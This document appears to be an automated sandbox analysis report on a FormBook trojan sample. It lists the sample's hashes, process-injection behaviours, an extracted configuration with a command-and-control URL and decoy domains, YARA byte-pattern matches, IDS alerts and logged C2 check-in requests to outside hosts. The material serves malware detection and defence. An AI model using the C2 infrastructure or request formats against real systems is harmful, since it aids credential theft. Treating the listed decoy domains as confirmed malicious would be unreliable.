Play interactive tour

Edit tour

Windows Analysis Report UaTmOE6yP9

Overview

General Information

Sample Name:	UaTmOE6yP9 (renamed file extension from none to exe)
Analysis ID:	492896
MD5:	4c70d5b1c63a468f7e0aedf64f93ca42
SHA1:	c248ab00560786b7be23151597d9503a2e84602f
SHA256:	83242a0f42be34e66e502e4a3a45d2470f3b24aef8a1d8484711f4439d7fe74a
Tags:	32exeFormbooktrojan
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to delay execution (extensive OutputDebugStringW loop)

Machine Learning detection for sample

Binary or sample is protected by dotNetProtector

Self deletion via cmd delete

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

UaTmOE6yP9.exe (PID: 6468 cmdline: 'C:\Users\user\Desktop\UaTmOE6yP9.exe' MD5: 4C70D5B1C63A468F7E0AEDF64F93CA42)

UaTmOE6yP9.exe (PID: 6624 cmdline: C:\Users\user\Desktop\UaTmOE6yP9.exe MD5: 4C70D5B1C63A468F7E0AEDF64F93CA42)

explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

wscript.exe (PID: 7088 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 7124 cmdline: /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.simpeltattofor.men/mjyv/"], "decoy": ["wenyuexuan.com", "tropicaldepression.info", "healthylifefit.com", "reemletenleafy.com", "jmrrve.com", "mabduh.com", "esomvw.com", "selfcaresereneneness.com", "murdabudz.com", "meinemail.online", "brandqrcodes.com", "live-in-pflege.com", "nickrecovery.com", "ziototoristorante.com", "chatcure.com", "corlora.com", "localagentlab.com", "yogo7.net", "krveop.com", "heianswer.xyz", "idproslot.xyz", "anielleharris.com", "lebonaharchitects.com", "chilestew.com", "ventasdecasasylotes.xyz", "welcome-sber.store", "ahmedintisher.com", "pastlinks.com", "productprinting.online", "babybox.media", "volteraenergy.net", "chinatowndeliver.com", "behiscalm.com", "totalselfconfidence.net", "single-on-purpose.com", "miyonbuilding.com", "medicalmanagementinc.info", "bellaalubo.com", "dubaibiologicdentist.com", "jspagnier-graveur.com", "deskbk.com", "thehauntdepot.com", "5fbuy.com", "calmingscience.com", "luvnecklace.com", "noun-bug.com", "mysenarai.com", "socialmediaplugin.com", "livinglovinglincoln.com", "vaxfreeschool.com", "bjjinmei.com", "p60p.com", "upgradepklohb.xyz", "georges-lego.com", "lkkogltoyof4.xyz", "fryhealty.com", "peacetransformationpath.com", "lightfootsteps.com", "recreativemysteriousgift.com", "luminoza.website", "mccorklehometeam.com", "car-insurance-rates-x2.info", "serpasboutiquedecarnes.com", "1971event.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8f38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x92d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x31d58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x320f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x59b78:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x59f12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14fe5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3de05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x65c25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14ad1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3d8f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x65711:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x150e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3df07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x65d27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1525f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3e07f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x65e9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9cea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x32b0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x5a92a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17409:$sqlite3step: 68 34 1C 7B E1 0x1751c:$sqlite3step: 68 34 1C 7B E1 0x40229:$sqlite3step: 68 34 1C 7B E1 0x4033c:$sqlite3step: 68 34 1C 7B E1 0x68049:$sqlite3step: 68 34 1C 7B E1 0x6815c:$sqlite3step: 68 34 1C 7B E1 0x17438:$sqlite3text: 68 38 2A 90 C5 0x1755d:$sqlite3text: 68 38 2A 90 C5 0x40258:$sqlite3text: 68 38 2A 90 C5 0x4037d:$sqlite3text: 68 38 2A 90 C5 0x68078:$sqlite3text: 68 38 2A 90 C5 0x6819d:$sqlite3text: 68 38 2A 90 C5 0x1744b:$sqlite3blob: 68 53 D8 7F 8C 0x17573:$sqlite3blob: 68 53 D8 7F 8C 0x4026b:$sqlite3blob: 68 53 D8 7F 8C 0x40393:$sqlite3blob: 68 53 D8 7F 8C 0x6808b:$sqlite3blob: 68 53 D8 7F 8C 0x681b3:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.UaTmOE6yP9.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.UaTmOE6yP9.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.UaTmOE6yP9.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
3.2.UaTmOE6yP9.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.UaTmOE6yP9.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.UaTmOE6yP9.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.simpeltattofor.men/mjyv/"], "decoy": ["wenyuexuan.com", "tropicaldepression.info", "healthylifefit.com", "reemletenleafy.com", "jmrrve.com", "mabduh.com", "esomvw.com", "selfcaresereneneness.com", "murdabudz.com", "meinemail.online", "brandqrcodes.com", "live-in-pflege.com", "nickrecovery.com", "ziototoristorante.com", "chatcure.com", "corlora.com", "localagentlab.com", "yogo7.net", "krveop.com", "heianswer.xyz", "idproslot.xyz", "anielleharris.com", "lebonaharchitects.com", "chilestew.com", "ventasdecasasylotes.xyz", "welcome-sber.store", "ahmedintisher.com", "pastlinks.com", "productprinting.online", "babybox.media", "volteraenergy.net", "chinatowndeliver.com", "behiscalm.com", "totalselfconfidence.net", "single-on-purpose.com", "miyonbuilding.com", "medicalmanagementinc.info", "bellaalubo.com", "dubaibiologicdentist.com", "jspagnier-graveur.com", "deskbk.com", "thehauntdepot.com", "5fbuy.com", "calmingscience.com", "luvnecklace.com", "noun-bug.com", "mysenarai.com", "socialmediaplugin.com", "livinglovinglincoln.com", "vaxfreeschool.com", "bjjinmei.com", "p60p.com", "upgradepklohb.xyz", "georges-lego.com", "lkkogltoyof4.xyz", "fryhealty.com", "peacetransformationpath.com", "lightfootsteps.com", "recreativemysteriousgift.com", "luminoza.website", "mccorklehometeam.com", "car-insurance-rates-x2.info", "serpasboutiquedecarnes.com", "1971event.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: UaTmOE6yP9.exe	Virustotal: Detection: 43%	Perma Link
Source: UaTmOE6yP9.exe	Metadefender: Detection: 37%	Perma Link
Source: UaTmOE6yP9.exe	ReversingLabs: Detection: 77%

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Show sources

Source: UaTmOE6yP9.exe

Avira: detected

Antivirus detection for URL or domain

Show sources

Source: www.simpeltattofor.men/mjyv/

Avira URL Cloud: Label: malware

Machine Learning detection for sample

Show sources

Source: UaTmOE6yP9.exe

Joe Sandbox ML: detected

Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: UaTmOE6yP9.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: UaTmOE6yP9.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: UaTmOE6yP9.exe, 00000003.00000002.412307284.0000000001360000.00000040.00000001.sdmp, wscript.exe, 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: UaTmOE6yP9.exe, 00000003.00000002.412307284.0000000001360000.00000040.00000001.sdmp, wscript.exe

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 4x nop then pop edi	3_2_004162E1
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 4x nop then pop edi	3_2_00415683
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop edi	9_2_00DD62E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop edi	9_2_00DD5683

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49812 -> 108.179.246.105:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49812 -> 108.179.246.105:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49812 -> 108.179.246.105:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49817 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49817 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49817 -> 23.227.38.74:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 108.179.246.105 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.corlora.com
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.thehauntdepot.com
Source: C:\Windows\explorer.exe	Domain query: www.bellaalubo.com
Source: C:\Windows\explorer.exe	Domain query: www.pastlinks.com
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 54.85.93.188 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.jspagnier-graveur.com
Source: C:\Windows\explorer.exe	Domain query: www.behiscalm.com
Source: C:\Windows\explorer.exe	Domain query: www.productprinting.online
Source: C:\Windows\explorer.exe	Domain query: www.miyonbuilding.com

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.simpeltattofor.men/mjyv/

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: global traffic	HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw== HTTP/1.1Host: www.bellaalubo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.behiscalm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ== HTTP/1.1Host: www.productprinting.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg== HTTP/1.1Host: www.corlora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.jspagnier-graveur.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
